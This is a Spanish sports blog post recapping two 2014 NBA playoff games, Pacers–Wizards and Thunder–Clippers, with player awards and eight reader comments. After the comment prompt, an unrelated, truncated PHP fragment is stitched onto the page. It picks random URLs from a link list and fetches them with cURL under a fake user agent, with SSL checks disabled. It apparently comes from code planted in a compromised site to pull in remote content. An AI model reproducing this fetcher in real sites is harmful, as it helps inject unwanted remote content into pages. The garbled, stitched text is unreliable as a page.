La Crónica: A romper los pronósticos

16 de May de 2014 por txusma

Se acabó la 2ª ronda. Pacers y Thunder intentarán evitar que se repita la final del año pasado aunque visto lo visto parece complicado.

Con todo lo que ha pasado esta temporada resulta que Indiana ha llegado al mismo punto que la temporada pasada lo que no dice nada bueno del nivel de la conferencia Este. De todas maneras, las expectativas son muy diferentes. Lejos queda la consistencia defensiva y la regularidad de la 1ª parte de la temporada y parece que los de Vogel sacan los partidos adelante gracias a la inspiración de alguno de sus jugadores pero nunca del rendimiento del conjunto. Ayer fueron David West y Lance Stephenson los que lideraron a los suyos y los condujeron a una victoria que pasada el ecuador del tercer cuarto parecía sencilla. Sin embargo, los Wizards consiguieron ponerse por delante a falta de 8:30 para el final a rebufo de John Wall y Bradley Beal. Era la primera vez y la última que los locales estaban por delante en el marcador en la 2ª parte. Con toda la energía gastada tras remontar, se pasaron 5 minutos sin anotar un solo punto y los Pacers pudieron cerrar el partido con comodidad (93-80). Final de temporada para unos brillantes Wizards que ven el futuro con optimismo mientras que los Pacers continúan su camino, quien sabe si hacia el matadero.

En el otro partido del día fue extrañísimo. Al final del primer cuarto los Clippers ganaban de 16 puntos, ventaja que fueron administrando tranquilamente hasta el descanso. Con Westbrook totalmente desaparecido y Doc Rivers controlando desde la banda no parecía que los Thunder pudieran ni llegar a inquietar a los locales pero en la 2ª parte llegó el colapso. De repente, conseguir una canasta jugando en estático era como un parto para los Clippers mientras que Kevin Durant se disfrazaba de superhéroe y Russell Westbrook comenzaba a enseñar la patita. Un triple de Nick Collison (fantástico en los minutos disputados debido a lesión de Serge Ibaka) empataba el partido al final del tercer cuarto y dejaba todo abierto para los últimos 12 minutos. El guión establecido desde el descansó no cambió y los Clippers fueron incapaces de volver a ponerse por delante en el marcador. Chris Paul se echó el equipo a las espaldas (14 puntos en este periodo) pero la eliminación de Blake Griffin a falta todavía de unos 3 minutos sentenció el partido (104-98). Los Thunder vuelven a la final de conferencia en la que se enfrentarán al ogro de todos los ogros, unos Spurs en un estado de forma primoroso a los que los Blazers no les han exigido demasiado. Por su parte, los Clippers vuelven a casa con mucho trabajo por hacer, sobretodo en las parcelas que no son deportivas. 

PREMIOS

MVP: Tremendo una vez más Kevin Durant (39p – 16r – 5a – 2t). Acabó el primer cuarto con solo 3 puntos y un 1 de 7 en TC pero a partir de ahí anotó 36 puntos con un 11 de 16.

Rookie: Me da que Kendrick Perkins se puede ir olvidando de jugar muchos minutos el año que viene porque pinta a suplente de Steven Adams (10p – 11r – 1t – 1rb). El neozelandés disputó 40 minutos nada más y nada menos.

Sorpresa: Muy buenos minutos de Nick Collison (4p – 2r – 2a – 1rb – 1t, en 17 minutos) sobretodo en su defensa sobre Blake Griffin. No hizo nada mal.

Decepción: Algo no va bien cuando Matt Barnes se ha de tirar 14 tiros. Lo normal es que pase lo de ayer, que falle 10.

Esfuerzo en vano: Chris Paul (25p – 11r – 7a) y Blake Griffin (22p – 8r – 8a) se quedaron cerca del triple doble pero encontraron muy poca ayuda de sus compañeros en ataque. La falta de frescura condenó a los Clippers.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Sin novedad en el frente, no? Más o menos todos nos imaginábamos estas finales de conferencia.
    Además la NBA está deseando una final Lebron vs KD

      Citar

  2. Nacho dice:
    #2

    La NBA ha hecho un grandioso ejercicio de gatopardismo. Cambiarlo todo para que nada cambie. Alcuarto partido de la primera ronda (sobre todo en el Oeste) parecían tambalearse los cimientos de lo esperado. Pero llegados a este punto las cosas están como se esperaba.¿ Alguien duda de que se repite la final del año pasado? Espero que el triple milagroso caiga este año del lado Spur. Pero aún queda para eso.

      Citar

  3. Jose Luis dice:
    #3

    Vaya, dos comentarios diciendo que la NBA orienta todo hacia una final dirigida, pero dando finales distintas, lo cual prueba que al menos uno de los dos está equivocado xD

    Simplemente me ha hecho gracia, no tengo nada contra ninguno de vosotros 🙂

    Al final lo esperado creo. Pacers iban a ganar a los Wizards ya fuera 4-1 o 4-2. Y Thunder igual, los Clippers viven de ex-jugadores casi, o jugadores con un nivel muy bajo al que presentaron anteriormente

    Mullens, Granger, Davis, Jamison, Turkoglu, Dudley, no son jugadores para PO. Luego, jugadores que han tenido un partido bueno, Barnes y Collison, y quizá Redick. Finalmente, los únicos que realmente valían algo, Griffin, Paul y Crawford. De Andre mitad si mitad no.

    Plantilla muy extensa pero sin calidad, en regular season han ganado por cantidad de jugadores y por estilo arrollador, pero cuando se pone la cosa dura es que no tienen equipo.

      Citar

  4. Esteban dice:
    #4

    Jose Luis: r, Davis, Jamison, Turkoglu, Dudley, no son jugadores para PO. L

    Jose Luis que parecdo este analisis al que hice al inicio de curso

    Los Clippers no tenian un gran equipo mas alla de CP3 y obviamente el mejor sexto hombre de la liga como Crawford, de ahi en mas han estado por encima de lo esperado gracias a un progreso notable de Griffin, principalmente en su porcentaje de libres (bastante mas flojo en rebotes) y algún que otro nuevo movimiento

    segunda ronda y dando guerra es un gran año para ellos

      Citar

  5. Esteban dice:
    #5

    Se termino el tercer año de CP3 en los Clippers, creo que no se puede catalogar de otra forma que un éxito absoluto, han transformado al hazme reír de la liga en un equipo competitivo, temido, admirado y marketinero, poco mas se puede pedir

    ahora si hablamos de Titulos, la cosa esta lejos, en tres años, su equipo ha estado en dos segundas rondas y en una primera, lejos lejos ha quedado

      Citar

  6. Educajasur dice:
    #6

    Muy de acuerdo con José Luis en que la plantilla de Clippers no estaba para jugásela a cara de perro con Thunders.

    En mi porra personal igual que vosotros, los cuatro mejores a finales de conferencia (bueno miento, al final metí la “sorpresa” de Bulls).

    Lo mejor de los playoffs está por venir, y se juegan ahora unos autontéticos partidazos, reedición de las finales de conferencia del año pasado con George VS James, Stephenson VS Wade, Hibbert, Bosh, West, Allen.
    Y los perennes Spurs, ahora contra Durant y compañía.
    Mi porra dice que se repiten finales NBA 🙂

    A disfrutar señores!

    (Enhorabuena por el blog, os leo siempre.)

      Citar

  7. Jose Luis dice:
    #7

    Gracias por tus comentarios Educajasur 🙂

    Yo también creo que se repiten las finales. Y la plantilla de Clippers son retales, piezas de nivel medio bajo, con 2 estrellas y 2 buenos jugadores sin más.

    Parecida a la del Thunder, pero estas dos estrellas tienen mucha más facilidad para anotar que Paul-Griffin, y eso se nota.

      Citar

  8. Ruxixon dice:
    #8

    Wall un poco ni fu ni fa,gran primer partido,errático en el tiro pero manejando el ritmo a su antojo,y quitando el partido del 3-2 donde cogió la responsabilidad de anotar,el resto de partidos se le ha visto un tanto al trantran.Me acojo a la quinta enmienda que en el baloncesto es eso de “bueno,en verano trabajará su tiro” que le vendría más que bien para no fiarlo todo a las penetraciones y al contrataque.

    ¡Ganas hay de ese Leonard vs Durant!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>